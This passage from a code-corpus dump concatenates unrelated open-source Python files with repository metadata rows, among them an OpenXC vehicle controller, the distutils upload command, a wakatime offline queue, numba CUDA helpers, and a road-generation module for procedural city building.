# right format, the command will have failed.
self.format = payload_format
return status
def rtc_configuration(self, unix_time):
"""Set the Unix time if RTC is supported on the device.
Returns True if the command was successful.
"""
request = {
"command": "rtc_configuration",
"unix_time": unix_time
}
status = self._check_command_response_status(request)
return status
def modem_configuration(self, host, port):
"""Set the host:port for the Cellular device to send data to.
Returns True if the command was successful.
"""
request = {
"command": "modem_configuration",
"host": host,
"port": port
}
status = self._check_command_response_status(request)
return status
def set_acceptance_filter_bypass(self, bus, bypass):
"""Control the status of CAN acceptance filter for a bus.
Returns True if the command was successful.
"""
request = {
"command": "af_bypass",
"bus": bus,
"bypass": bypass
}
return self._check_command_response_status(request)
def set_predefined_obd2_requests(self, enabled):
"""Control if pre-defined OBD2 requests should be sent.
Returns True if the command was successful.
"""
request = {
"command": "predefined_obd2",
"enabled": enabled
}
return self._check_command_response_status(request)
def _check_command_response_message(self, request):
responses = self.complex_request(request)
result = None
if len(responses) > 0:
result = responses[0].get('message')
return result
def version(self):
"""Request a firmware version identifier from the VI.
"""
request = {
"command": "version"
}
return self._check_command_response_message(request)
def platform(self):
"""Request the VI platform.
"""
request = {
"command": "platform"
}
return self._check_command_response_message(request)
def sd_mount_status(self):
"""Request for SD Mount status if available.
"""
request = {
"command": "sd_mount_status"
}
responses = self.complex_request(request)
result = None
if len(responses) > 0:
result = responses[0].get('status')
return result
def device_id(self):
"""Request the unique device ID of the attached VI.
"""
request = {
"command": "device_id"
}
return self._check_command_response_message(request)
def write(self, **kwargs):
"""Serialize a raw or translated write request and send it to the VI,
following the OpenXC message format.
"""
if 'id' in kwargs and 'data' in kwargs:
result = self.write_raw(kwargs['id'], kwargs['data'],
bus=kwargs.get('bus', None),
frame_format=kwargs.get('frame_format', None))
else:
result = self.write_translated(kwargs['name'], kwargs['value'],
event=kwargs.get('event', None))
return result
def write_translated(self, name, value, event=None):
"""Send a translated write request to the VI.
"""
data = {'name': name}
if value is not None:
data['value'] = self._massage_write_value(value)
if event is not None:
data['event'] = self._massage_write_value(event);
message = self.streamer.serialize_for_stream(data)
bytes_written = self.write_bytes(message)
assert bytes_written == len(message)
return bytes_written
def write_raw(self, id, data, bus=None, frame_format=None):
"""Send a raw write request to the VI.
"""
if not isinstance(id, numbers.Number):
try:
id = int(id, 0)
except ValueError:
raise ValueError("ID must be numerical")
data = {'id': id, 'data': data}
if bus is not None:
data['bus'] = bus
if frame_format is not None:
data['frame_format'] = frame_format
message = self.streamer.serialize_for_stream(data)
bytes_written = self.write_bytes(message)
assert bytes_written == len(message)
return bytes_written
def stop(self):
pass
def write_bytes(self, data):
"""Write the bytes in ``data`` to the controller interface."""
raise NotImplementedError("Don't use Controller directly")
@classmethod
def _massage_write_value(cls, value):
"""Convert string values from command-line arguments into first-order
Python boolean and float objects, if applicable.
"""
if not isinstance(value, numbers.Number):
if value == "true":
value = True
elif value == "false":
value = False
elif value[0] == '"' and value[-1] == '"':
value = value[1:-1]
else:
try:
value = float(value)
except ValueError:
pass
return value
class ControllerError(Exception):
pass
|
bsd-3-clause
| -6,919,577,415,630,533,000
| 35.338645
| 102
| 0.592589
| false
| 4.589182
| false
| false
| false
|
apenchev/tangowithdjango
|
rango/migrations/0001_initial.py
|
1
|
1093
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=128)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Page',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=128)),
('url', models.URLField()),
('views', models.IntegerField(default=0)),
('category', models.ForeignKey(to='rango.Category')),
],
options={
},
bases=(models.Model,),
),
]
|
mit
| 5,240,946,657,495,729,000
| 29.388889
| 114
| 0.508692
| false
| 4.690987
| false
| false
| false
|
glimix/limix-inference
|
glimix_core/cov/_eye.py
|
1
|
2215
|
from numpy import exp, eye, log
from optimix import Function, Scalar
from .._util import format_function
class EyeCov(Function):
"""
Identity covariance function, K = s·I.
The parameter s is the scale of the matrix.
Example
-------
.. doctest::
>>> from glimix_core.cov import EyeCov
>>>
>>> cov = EyeCov(2)
>>> cov.scale = 2.5
>>> print(cov.value())
[[2.5 0. ]
[0. 2.5]]
>>> g = cov.gradient()
>>> print(g['logscale'])
[[2.5 0. ]
[0. 2.5]]
>>> cov.name = "I"
>>> print(cov)
EyeCov(dim=2): I
scale: 2.5
Parameters
----------
dim : int
Matrix dimension, d.
"""
def __init__(self, dim):
"""
Constructor.
Parameters
----------
dim : int
Matrix dimension, d.
"""
self._dim = dim
self._I = eye(dim)
self._logscale = Scalar(0.0)
Function.__init__(self, "EyeCov", logscale=self._logscale)
self._logscale.bounds = (-20.0, +10)
@property
def scale(self):
"""
Scale parameter.
"""
return exp(self._logscale)
@scale.setter
def scale(self, scale):
from numpy_sugar import epsilon
scale = max(scale, epsilon.tiny)
self._logscale.value = log(scale)
@property
def dim(self):
"""
Dimension of the matrix, d.
It corresponds to the number of rows and to the number of columns.
"""
return self._I.shape[0]
def value(self):
"""
Covariance matrix.
Returns
-------
K : ndarray
s⋅I, for scale s and a d×d identity matrix I.
"""
return self.scale * self._I
def gradient(self):
"""
Derivative of the covariance matrix over log(s), s⋅I.
Returns
-------
logscale : ndarray
s⋅I, for scale s and a d×d identity matrix I.
"""
return dict(logscale=self.value())
def __str__(self):
return format_function(self, {"dim": self._I.shape[0]}, [("scale", self.scale)])
|
mit
| -9,038,107,732,543,751,000
| 20.627451
| 88
| 0.485041
| false
| 3.816609
| false
| false
| false
|
Suwmlee/XX-Net
|
Python3/lib/distutils/command/upload.py
|
1
|
7515
|
"""
distutils.command.upload
Implements the Distutils 'upload' subcommand (upload package to a package
index).
"""
import os
import io
import platform
import hashlib
from base64 import standard_b64encode
from urllib.request import urlopen, Request, HTTPError
from urllib.parse import urlparse
from distutils.errors import DistutilsError, DistutilsOptionError
from distutils.core import PyPIRCCommand
from distutils.spawn import spawn
from distutils import log
class upload(PyPIRCCommand):
description = "upload binary package to PyPI"
user_options = PyPIRCCommand.user_options + [
('sign', 's',
'sign files to upload using gpg'),
('identity=', 'i', 'GPG identity used to sign files'),
]
boolean_options = PyPIRCCommand.boolean_options + ['sign']
def initialize_options(self):
PyPIRCCommand.initialize_options(self)
self.username = ''
self.password = ''
self.show_response = 0
self.sign = False
self.identity = None
def finalize_options(self):
PyPIRCCommand.finalize_options(self)
if self.identity and not self.sign:
raise DistutilsOptionError(
"Must use --sign for --identity to have meaning"
)
config = self._read_pypirc()
if config != {}:
self.username = config['username']
self.password = config['password']
self.repository = config['repository']
self.realm = config['realm']
# getting the password from the distribution
# if previously set by the register command
if not self.password and self.distribution.password:
self.password = self.distribution.password
def run(self):
if not self.distribution.dist_files:
msg = "No dist file created in earlier command"
raise DistutilsOptionError(msg)
for command, pyversion, filename in self.distribution.dist_files:
self.upload_file(command, pyversion, filename)
def upload_file(self, command, pyversion, filename):
# Makes sure the repository URL is compliant
schema, netloc, url, params, query, fragments = \
urlparse(self.repository)
if params or query or fragments:
raise AssertionError("Incompatible url %s" % self.repository)
if schema not in ('http', 'https'):
raise AssertionError("unsupported schema " + schema)
# Sign if requested
if self.sign:
gpg_args = ["gpg", "--detach-sign", "-a", filename]
if self.identity:
gpg_args[2:2] = ["--local-user", self.identity]
spawn(gpg_args,
dry_run=self.dry_run)
# Fill in the data - send all the meta-data in case we need to
# register a new release
f = open(filename,'rb')
try:
content = f.read()
finally:
f.close()
meta = self.distribution.metadata
data = {
# action
':action': 'file_upload',
'protcol_version': '1',
# identify release
'name': meta.get_name(),
'version': meta.get_version(),
# file content
'content': (os.path.basename(filename),content),
'filetype': command,
'pyversion': pyversion,
'md5_digest': hashlib.md5(content).hexdigest(),
# additional meta-data
'metadata_version': '1.0',
'summary': meta.get_description(),
'home_page': meta.get_url(),
'author': meta.get_contact(),
'author_email': meta.get_contact_email(),
'license': meta.get_licence(),
'description': meta.get_long_description(),
'keywords': meta.get_keywords(),
'platform': meta.get_platforms(),
'classifiers': meta.get_classifiers(),
'download_url': meta.get_download_url(),
# PEP 314
'provides': meta.get_provides(),
'requires': meta.get_requires(),
'obsoletes': meta.get_obsoletes(),
}
comment = ''
if command == 'bdist_rpm':
dist, version, id = platform.dist()
if dist:
comment = 'built for %s %s' % (dist, version)
elif command == 'bdist_dumb':
comment = 'built for %s' % platform.platform(terse=1)
data['comment'] = comment
if self.sign:
data['gpg_signature'] = (os.path.basename(filename) + ".asc",
open(filename+".asc", "rb").read())
# set up the authentication
user_pass = (self.username + ":" + self.password).encode('ascii')
# The exact encoding of the authentication string is debated.
# Anyway PyPI only accepts ascii for both username or password.
auth = "Basic " + standard_b64encode(user_pass).decode('ascii')
# Build up the MIME payload for the POST data
boundary = '--------------GHSKFJDLGDS7543FJKLFHRE75642756743254'
sep_boundary = b'\r\n--' + boundary.encode('ascii')
end_boundary = sep_boundary + b'--\r\n'
body = io.BytesIO()
for key, value in data.items():
title = '\r\nContent-Disposition: form-data; name="%s"' % key
# handle multiple entries for the same name
if not isinstance(value, list):
value = [value]
for value in value:
if type(value) is tuple:
title += '; filename="%s"' % value[0]
value = value[1]
else:
value = str(value).encode('utf-8')
body.write(sep_boundary)
body.write(title.encode('utf-8'))
body.write(b"\r\n\r\n")
body.write(value)
if value and value[-1:] == b'\r':
body.write(b'\n') # write an extra newline (lurve Macs)
body.write(end_boundary)
body = body.getvalue()
msg = "Submitting %s to %s" % (filename, self.repository)
self.announce(msg, log.INFO)
# build the Request
headers = {
'Content-type': 'multipart/form-data; boundary=%s' % boundary,
'Content-length': str(len(body)),
'Authorization': auth,
}
request = Request(self.repository, data=body,
headers=headers)
# send the data
try:
result = urlopen(request)
status = result.getcode()
reason = result.msg
except OSError as e:
self.announce(str(e), log.ERROR)
raise
except HTTPError as e:
status = e.code
reason = e.msg
if status == 200:
self.announce('Server response (%s): %s' % (status, reason),
log.INFO)
else:
msg = 'Upload failed (%s): %s' % (status, reason)
self.announce(msg, log.ERROR)
raise DistutilsError(msg)
if self.show_response:
text = self._read_pypi_response(result)
msg = '\n'.join(('-' * 75, text, '-' * 75))
self.announce(msg, log.INFO)
|
bsd-2-clause
| -7,851,997,256,913,855,000
| 35.38806
| 76
| 0.534398
| false
| 4.407625
| true
| false
| false
|
AppVentus/AvTime-client
|
packages/wakatime/wakatime/queue.py
|
1
|
3769
|
# -*- coding: utf-8 -*-
"""
wakatime.queue
~~~~~~~~~~~~~~
Queue for offline time logging.
http://wakatime.com
:copyright: (c) 2014 Alan Hamlett.
:license: BSD, see LICENSE for more details.
"""
import logging
import os
import traceback
from time import sleep
try:
import sqlite3
HAS_SQL = True
except ImportError:
HAS_SQL = False
log = logging.getLogger(__name__)
class Queue(object):
DB_FILE = os.path.join(os.path.expanduser('~'), '.wakatime.db')
def connect(self):
conn = sqlite3.connect(self.DB_FILE)
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS action (
file text,
time real,
project text,
language text,
lines integer,
branch text,
is_write integer,
plugin text)
''')
return (conn, c)
def push(self, data, plugin):
if not HAS_SQL:
return
try:
conn, c = self.connect()
action = {
'file': data.get('file'),
'time': data.get('time'),
'project': data.get('project'),
'language': data.get('language'),
'lines': data.get('lines'),
'branch': data.get('branch'),
'is_write': 1 if data.get('is_write') else 0,
'plugin': plugin,
}
c.execute('INSERT INTO action VALUES (:file,:time,:project,:language,:lines,:branch,:is_write,:plugin)', action)
conn.commit()
conn.close()
except sqlite3.Error:
log.error(traceback.format_exc())
def pop(self):
if not HAS_SQL:
return None
tries = 3
wait = 0.1
action = None
try:
conn, c = self.connect()
except sqlite3.Error:
log.debug(traceback.format_exc())
return None
loop = True
while loop and tries > -1:
try:
c.execute('BEGIN IMMEDIATE')
c.execute('SELECT * FROM action LIMIT 1')
row = c.fetchone()
if row is not None:
values = []
clauses = []
index = 0
for row_name in ['file', 'time', 'project', 'language', 'lines', 'branch', 'is_write']:
if row[index] is not None:
clauses.append('{0}=?'.format(row_name))
values.append(row[index])
else:
clauses.append('{0} IS NULL'.format(row_name))
index += 1
if len(values) > 0:
c.execute('DELETE FROM action WHERE {0}'.format(' AND '.join(clauses)), values)
else:
c.execute('DELETE FROM action WHERE {0}'.format(' AND '.join(clauses)))
conn.commit()
if row is not None:
action = {
'file': row[0],
'time': row[1],
'project': row[2],
'language': row[3],
'lines': row[4],
'branch': row[5],
'is_write': True if row[6] is 1 else False,
'plugin': row[7],
}
loop = False
except sqlite3.Error:
log.debug(traceback.format_exc())
sleep(wait)
tries -= 1
try:
conn.close()
except sqlite3.Error:
log.debug(traceback.format_exc())
return action
|
bsd-3-clause
| -8,956,881,329,862,973,000
| 29.893443
| 124
| 0.439639
| false
| 4.535499
| false
| false
| false
|
cpcloud/numba
|
numba/cuda/nvvmutils.py
|
1
|
5407
|
from __future__ import print_function, absolute_import, division
import itertools
import llvmlite.llvmpy.core as lc
from .cudadrv import nvvm
from numba import cgutils
def declare_atomic_cas_int32(lmod):
fname = '___numba_cas_hack'
fnty = lc.Type.function(lc.Type.int(32),
(lc.Type.pointer(lc.Type.int(32)), lc.Type.int(32), lc.Type.int(32)))
return lmod.get_or_insert_function(fnty, fname)
def declare_atomic_add_float32(lmod):
fname = 'llvm.nvvm.atomic.load.add.f32.p0f32'
fnty = lc.Type.function(lc.Type.float(),
(lc.Type.pointer(lc.Type.float(), 0), lc.Type.float()))
return lmod.get_or_insert_function(fnty, name=fname)
def declare_atomic_add_float64(lmod):
fname = '___numba_atomic_double_add'
fnty = lc.Type.function(lc.Type.double(),
(lc.Type.pointer(lc.Type.double()), lc.Type.double()))
return lmod.get_or_insert_function(fnty, fname)
def declare_atomic_max_float32(lmod):
fname = '___numba_atomic_float_max'
fnty = lc.Type.function(lc.Type.float(),
(lc.Type.pointer(lc.Type.float()), lc.Type.float()))
return lmod.get_or_insert_function(fnty, fname)
def declare_atomic_max_float64(lmod):
fname = '___numba_atomic_double_max'
fnty = lc.Type.function(lc.Type.double(),
(lc.Type.pointer(lc.Type.double()), lc.Type.double()))
return lmod.get_or_insert_function(fnty, fname)
def declare_atomic_min_float32(lmod):
fname = '___numba_atomic_float_min'
fnty = lc.Type.function(lc.Type.float(),
(lc.Type.pointer(lc.Type.float()), lc.Type.float()))
return lmod.get_or_insert_function(fnty, fname)
def declare_atomic_min_float64(lmod):
fname = '___numba_atomic_double_min'
fnty = lc.Type.function(lc.Type.double(),
(lc.Type.pointer(lc.Type.double()), lc.Type.double()))
return lmod.get_or_insert_function(fnty, fname)
def insert_addrspace_conv(lmod, elemtype, addrspace):
addrspacename = {
nvvm.ADDRSPACE_SHARED: 'shared',
nvvm.ADDRSPACE_LOCAL: 'local',
nvvm.ADDRSPACE_CONSTANT: 'constant',
}[addrspace]
tyname = str(elemtype)
tyname = {'float': 'f32', 'double': 'f64'}.get(tyname, tyname)
s2g_name_fmt = 'llvm.nvvm.ptr.' + addrspacename + '.to.gen.p0%s.p%d%s'
s2g_name = s2g_name_fmt % (tyname, addrspace, tyname)
elem_ptr_ty = lc.Type.pointer(elemtype)
elem_ptr_ty_addrspace = lc.Type.pointer(elemtype, addrspace)
s2g_fnty = lc.Type.function(elem_ptr_ty,
[elem_ptr_ty_addrspace])
return lmod.get_or_insert_function(s2g_fnty, s2g_name)
def declare_string(builder, value):
lmod = builder.basic_block.function.module
cval = lc.Constant.stringz(value)
gl = lmod.add_global_variable(cval.type, name="_str",
addrspace=nvvm.ADDRSPACE_CONSTANT)
gl.linkage = lc.LINKAGE_INTERNAL
gl.global_constant = True
gl.initializer = cval
charty = lc.Type.int(8)
constcharptrty = lc.Type.pointer(charty, nvvm.ADDRSPACE_CONSTANT)
charptr = builder.bitcast(gl, constcharptrty)
conv = insert_addrspace_conv(lmod, charty, nvvm.ADDRSPACE_CONSTANT)
return builder.call(conv, [charptr])
def declare_vprint(lmod):
voidptrty = lc.Type.pointer(lc.Type.int(8))
# NOTE: the second argument to vprintf() points to the variable-length
# array of arguments (after the format)
vprintfty = lc.Type.function(lc.Type.int(), [voidptrty, voidptrty])
vprintf = lmod.get_or_insert_function(vprintfty, "vprintf")
return vprintf
# -----------------------------------------------------------------------------
SREG_MAPPING = {
'tid.x': 'llvm.nvvm.read.ptx.sreg.tid.x',
'tid.y': 'llvm.nvvm.read.ptx.sreg.tid.y',
'tid.z': 'llvm.nvvm.read.ptx.sreg.tid.z',
'ntid.x': 'llvm.nvvm.read.ptx.sreg.ntid.x',
'ntid.y': 'llvm.nvvm.read.ptx.sreg.ntid.y',
'ntid.z': 'llvm.nvvm.read.ptx.sreg.ntid.z',
'ctaid.x': 'llvm.nvvm.read.ptx.sreg.ctaid.x',
'ctaid.y': 'llvm.nvvm.read.ptx.sreg.ctaid.y',
'ctaid.z': 'llvm.nvvm.read.ptx.sreg.ctaid.z',
'nctaid.x': 'llvm.nvvm.read.ptx.sreg.nctaid.x',
'nctaid.y': 'llvm.nvvm.read.ptx.sreg.nctaid.y',
'nctaid.z': 'llvm.nvvm.read.ptx.sreg.nctaid.z',
'warpsize': 'llvm.nvvm.read.ptx.sreg.warpsize',
'laneid': 'llvm.nvvm.read.ptx.sreg.laneid',
}
def call_sreg(builder, name):
module = builder.module
fnty = lc.Type.function(lc.Type.int(), ())
fn = module.get_or_insert_function(fnty, name=SREG_MAPPING[name])
return builder.call(fn, ())
class SRegBuilder(object):
def __init__(self, builder):
self.builder = builder
def tid(self, xyz):
return call_sreg(self.builder, 'tid.%s' % xyz)
def ctaid(self, xyz):
return call_sreg(self.builder, 'ctaid.%s' % xyz)
def ntid(self, xyz):
return call_sreg(self.builder, 'ntid.%s' % xyz)
def nctaid(self, xyz):
return call_sreg(self.builder, 'nctaid.%s' % xyz)
def getdim(self, xyz):
tid = self.tid(xyz)
ntid = self.ntid(xyz)
nctaid = self.ctaid(xyz)
res = self.builder.add(self.builder.mul(ntid, nctaid), tid)
return res
def get_global_id(builder, dim):
sreg = SRegBuilder(builder)
it = (sreg.getdim(xyz) for xyz in 'xyz')
seq = list(itertools.islice(it, None, dim))
if dim == 1:
return seq[0]
else:
return seq
|
bsd-2-clause
| 2,699,991,475,804,289,000
| 32.79375
| 80
| 0.634918
| false
| 2.77852
| false
| false
| false
|
crackhopper/TFS-toolbox
|
tfs/core/layer/fc.py
|
1
|
1671
|
import tensorflow as tf
import numpy as np
from tfs.core.layer import ops as ops
from tfs.core.layer.base import Layer
import tfs.core.initializer.init_func as init
from tfs.core.util import get_arg_dict
class FullyConnect(Layer):
def __init__(self,
net,
outdim,
activation = ops.relu,
name=None,
print_names=['outdim','activation']
):
vtable = get_arg_dict(excludes=['self','net'])
super(FullyConnect,self).__init__(net,**vtable)
def _build(self):
inTensor = self._in
input_shape = inTensor.get_shape()
if input_shape.ndims == 4:
# The input is spatial. Vectorize it first.
dim = np.prod(input_shape.as_list()[1:])
output = tf.reshape(inTensor, [-1,dim])
else:
output, dim = (inTensor, input_shape[-1].value)
weights = self._make_variable('weights', shape=[dim, self.param.outdim],init=init.xavier())
biases = self._make_variable('biases', [self.param.outdim],init=init.constant())
output = tf.nn.xw_plus_b(output, weights, biases,name=self.name)
if self.param.activation:
output= self.param.activation(output, name=self.name)
return output
def _inverse(self):
outTensor = self._inv_in
name = 'inv_'+self.name
act = self.param.activation
if act:
outTensor = act(outTensor)
weights = tf.transpose(self._variables['weights'])
inv_fc = tf.matmul(outTensor,weights)
shape = self._in.get_shape().as_list()
shape[0]=-1
inv_fc = tf.reshape(inv_fc,shape)
print('inv_fc '+str(outTensor.get_shape().as_list()) + '->' + str(inv_fc.get_shape().as_list()))
return inv_fc
|
mit
| 4,118,972,735,694,420,000
| 33.102041
| 100
| 0.630162
| false
| 3.322068
| false
| false
| false
|
raphaelrpl/portal
|
backend/test/recommendation_tests/recommendation_rest_tests.py
|
1
|
3088
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from datetime import datetime, date
from decimal import Decimal
from base import GAETestCase
from recommendation_app.model import Recommendation
from routes.recommendations import rest
from gaegraph.model import Node
from mock import Mock
from mommygae import mommy
class IndexTests(GAETestCase):
def test_success(self):
mommy.save_one(Recommendation)
mommy.save_one(Recommendation)
json_response = rest.index()
context = json_response.context
self.assertEqual(2, len(context))
recommendation_dct = context[0]
self.assertSetEqual(set(['id', 'creation', 'name']), set(recommendation_dct.iterkeys()))
self.assert_can_serialize_as_json(json_response)
class NewTests(GAETestCase):
def test_success(self):
self.assertIsNone(Recommendation.query().get())
json_response = rest.new(None, name='name_string')
db_recommendation = Recommendation.query().get()
self.assertIsNotNone(db_recommendation)
self.assertEquals('name_string', db_recommendation.name)
self.assert_can_serialize_as_json(json_response)
def test_error(self):
resp = Mock()
json_response = rest.new(resp)
errors = json_response.context
self.assertEqual(500, resp.status_code)
self.assertSetEqual(set(['name']), set(errors.keys()))
self.assert_can_serialize_as_json(json_response)
class EditTests(GAETestCase):
def test_success(self):
recommendation = mommy.save_one(Recommendation)
old_properties = recommendation.to_dict()
json_response = rest.edit(None, recommendation.key.id(), name='name_string')
db_recommendation = recommendation.key.get()
self.assertEquals('name_string', db_recommendation.name)
self.assertNotEqual(old_properties, db_recommendation.to_dict())
self.assert_can_serialize_as_json(json_response)
def test_error(self):
recommendation = mommy.save_one(Recommendation)
old_properties = recommendation.to_dict()
resp = Mock()
json_response = rest.edit(resp, recommendation.key.id())
errors = json_response.context
self.assertEqual(500, resp.status_code)
self.assertSetEqual(set(['name']), set(errors.keys()))
self.assertEqual(old_properties, recommendation.key.get().to_dict())
self.assert_can_serialize_as_json(json_response)
class DeleteTests(GAETestCase):
def test_success(self):
recommendation = mommy.save_one(Recommendation)
rest.delete(None, recommendation.key.id())
self.assertIsNone(recommendation.key.get())
def test_non_recommendation_deletion(self):
non_recommendation = mommy.save_one(Node)
response = Mock()
json_response = rest.delete(response, non_recommendation.key.id())
self.assertIsNotNone(non_recommendation.key.get())
self.assertEqual(500, response.status_code)
self.assert_can_serialize_as_json(json_response)
|
mit
| -3,372,677,403,984,990,000
| 38.589744
| 96
| 0.686528
| false
| 3.845579
| true
| false
| false
|
hhauer/myinfo
|
oam_base/urls.py
|
1
|
1496
|
from django.conf.urls import include, url
from django.core.urlresolvers import reverse_lazy
from django.views.generic import RedirectView
from MyInfo import views as my_info_views
from django_cas import views as cas_views
from oam_base import views as base_views
from Duo import views as duo_views
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = [
url(r'^$', my_info_views.index, name='index'),
url(r'^MyInfo/', include('MyInfo.urls', namespace='MyInfo')),
url(r'^AccountPickup/', include('AccountPickup.urls', namespace='AccountPickup')),
url(r'^PasswordReset/', include('PasswordReset.urls', namespace='PasswordReset')),
url(r'^accounts/login/$', cas_views.login, {'next_page': reverse_lazy('AccountPickup:next_step')}, name='CASLogin'),
url(r'^duo/login/$', cas_views.login, name='duoLogin'),
url(r'^accounts/logout/$', cas_views.logout, name='CASLogout'),
url(r'^status/denied/$', base_views.rate_limited, name='rate_limited'),
url(r'^ajax/', include('ajax.urls')),
url(r'^admin/', include(admin.site.urls)),
# Simple redirects for static files that browsers expect to be at the root.
url(r'^robots\.txt$', RedirectView.as_view(url='/static/robots.txt', permanent=True)),
url(r'^favicon\.ico$', RedirectView.as_view(url='/static/favicon.ico', permanent=True)),
url(r'^duo$', duo_views.login, name='duo_login')
]
handler500 = 'oam_base.views.custom_error'
|
mit
| -2,922,288,893,709,480,000
| 39.459459
| 120
| 0.706551
| false
| 3.43908
| false
| false
| false
|
Flamacue/pretix
|
src/pretix/control/utils/i18n.py
|
2
|
2085
|
# Inspired by https://github.com/asaglimbeni/django-datetime-widget/blob/master/datetimewidget/widgets.py
# Copyright (c) 2013, Alfredo Saglimbeni (BSD license)
import re
from django.utils import translation
from django.utils.formats import get_format
from pretix import settings
date_conversion_to_moment = {
'%a': 'ddd',
'%A': 'dddd',
'%w': 'd',
'%d': 'DD',
'%b': 'MMM',
'%B': 'MMMM',
'%m': 'MM',
'%y': 'YY',
'%Y': 'YYYY',
'%H': 'HH',
'%I': 'hh',
'%p': 'a',
'%M': 'mm',
'%S': 'ss',
'%f': 'SSSSSS',
'%z': 'ZZ',
'%Z': 'zz',
'%j': 'DDDD',
'%U': 'ww', # fuzzy translation
'%W': 'WW',
'%c': '',
'%x': '',
'%X': ''
}
moment_locales = {
'af', 'az', 'bs', 'de-at', 'en-gb', 'et', 'fr-ch', 'hi', 'it', 'ko', 'me', 'ms-my', 'pa-in', 'se', 'sr', 'th',
'tzm-latn', 'zh-hk', 'ar', 'be', 'ca', 'de', 'en-ie', 'eu', 'fr', 'hr', 'ja', 'ky', 'mi', 'my', 'pl', 'si', 'ss',
'tlh', 'uk', 'zh-tw', 'ar-ly', 'bg', 'cs', 'dv', 'en-nz', 'fa', 'fy', 'hu', 'jv', 'lb', 'mk', 'nb', 'pt-br', 'sk',
'sv', 'tl-ph', 'uz', 'ar-ma', 'bn', 'cv', 'el', 'eo', 'fi', 'gd', 'hy-am', 'ka', 'lo', 'ml', 'ne', 'pt', 'sl', 'sw',
'tr', 'vi', 'ar-sa', 'bo', 'cy', 'en-au', 'es-do', 'fo', 'gl', 'id', 'kk', 'lt', 'mr', 'nl', 'ro', 'sq', 'ta',
'tzl', 'x-pseudo', 'ar-tn', 'br', 'da', 'en-ca', 'es', 'fr-ca', 'he', 'is', 'km', 'lv', 'ms', 'nn', 'ru', 'sr-cyrl',
'te', 'tzm', 'zh-cn',
}
toJavascript_re = re.compile(r'(?<!\w)(' + '|'.join(date_conversion_to_moment.keys()) + r')\b')
def get_javascript_format(format_name):
f = get_format(format_name)[0]
return toJavascript_re.sub(
lambda x: date_conversion_to_moment[x.group()],
f
)
def get_moment_locale(locale=None):
cur_lang = locale or translation.get_language()
if cur_lang in moment_locales:
return cur_lang
if '-' in cur_lang or '_' in cur_lang:
main = cur_lang.replace("_", "-").split("-")[0]
if main in moment_locales:
return main
return settings.LANGUAGE_CODE
|
apache-2.0
| -4,935,072,335,436,854,000
| 31.076923
| 120
| 0.478177
| false
| 2.53034
| false
| false
| false
|
ctogle/make_places
|
mp/make_places/roads.py
|
1
|
33156
|
import make_places.fundamental as fu
import mp_utils as mpu
import mp_bboxes as mpbb
import make_places.primitives as pr
#from make_places.fundamental import element
from make_places.scenegraph import node
from make_places.floors import floor
from make_places.primitives import arbitrary_primitive
from make_places.primitives import ucube
from make_places.primitives import uoctagon
#from make_places.primitives import unit_cube
import make_places.pkler as pk
import os, pdb
import numpy as np
import random as rm
from math import sqrt
from math import cos
from math import sin
from math import tan
from copy import deepcopy as dcopy
cardinal_directions = [
'north', 'northeast',
'east', 'southeast',
'south', 'southwest',
'west', 'northwest']
cardinal_norms = [
[0,1,0],mpu.normalize([1,1,0]),
[1,0,0],mpu.normalize([1,-1,0]),
[0,-1,0],mpu.normalize([-1,-1,0]),
[-1,0,0],mpu.normalize([-1,1,0])]
class vehicle_primitive(arbitrary_primitive):
vehiclexml = os.path.join(pr.primitive_data_path, 'truck.mesh.xml')
#vehicledata = pr.primitive_data_from_xml(vehiclexml)
offset = [0,0,0]
def __init__(self, *args, **kwargs):
pvehdata = pr.primitive_data_from_xml(self.vehiclexml)
#pvehdata = self.vehicledata
arbitrary_primitive.__init__(self, *args, **pvehdata)
self._default_('tag','_vehicle_',**kwargs)
self._scale_uvs_ = False
self.translate(self.offset)
class truck_primitive(vehicle_primitive):
vehiclexml = os.path.join(pr.primitive_data_path, 'truck.mesh.xml')
#vehicledata = pr.primitive_data_from_xml(vehiclexml)
class taxi_primitive(vehicle_primitive):
vehiclexml = os.path.join(pr.primitive_data_path, 'Body.mesh.xml')
#vehicledata = pr.primitive_data_from_xml(vehiclexml)
offset = [0,0,0.5]
class car_batch(node):
possible_vehicles = [truck_primitive,taxi_primitive]
def __init__(self, *args, **kwargs):
self._default_('cargs',[],**kwargs)
self._default_('consumes_children',True,**kwargs)
self._default_('grit_renderingdistance',100,**kwargs)
self._default_('grit_lod_renderingdistance',2000,**kwargs)
self.primitives = self.make_batch(self.cargs)
node.__init__(self, *args, **kwargs)
def make_batch(self, cargs):
cars = []
for cgs in cargs:
new = rm.choice(self.possible_vehicles)()
new.rotate_z(cgs['rotation'][2])
new.translate(cgs['position'])
cars.append(new)
return cars
clip_length = 25
class intersection(node):
def __init__(self, *args, **kwargs):
#self._default_('consumes_children',True,**kwargs)
self._default_('grit_renderingdistance',1000,**kwargs)
self._default_('grit_lod_renderingdistance',2000,**kwargs)
self._default_('tform',self.def_tform(*args,**kwargs),**kwargs)
self._default_('road_width',20,**kwargs)
self._default_('road_height',2,**kwargs)
self.primitives = self.make_segments(*args, **kwargs)
children = self.place_vehicles()
self.add_child(*children)
node.__init__(self, *args, **kwargs)
def find_corners(self):
v1 = [ clip_length, clip_length*tan(fu.to_rad(22.5)),0]
v2 = [ clip_length,-clip_length*tan(fu.to_rad(22.5)),0]
v3 = [-clip_length, clip_length*tan(fu.to_rad(22.5)),0]
v4 = [-clip_length,-clip_length*tan(fu.to_rad(22.5)),0]
v5 = [ clip_length*tan(fu.to_rad(22.5)), clip_length,0]
v6 = [-clip_length*tan(fu.to_rad(22.5)), clip_length,0]
v7 = [ clip_length*tan(fu.to_rad(22.5)),-clip_length,0]
v8 = [-clip_length*tan(fu.to_rad(22.5)),-clip_length,0]
corners = [v1, v2, v3, v4, v5, v6, v7, v8]
return corners
def terrain_points(self):
# i need the location of the octagon verts!
#rh2 = self.road_height/2.0
rh2 = 0.4
corners = self.find_corners()
center = mpu.center_of_mass(corners)
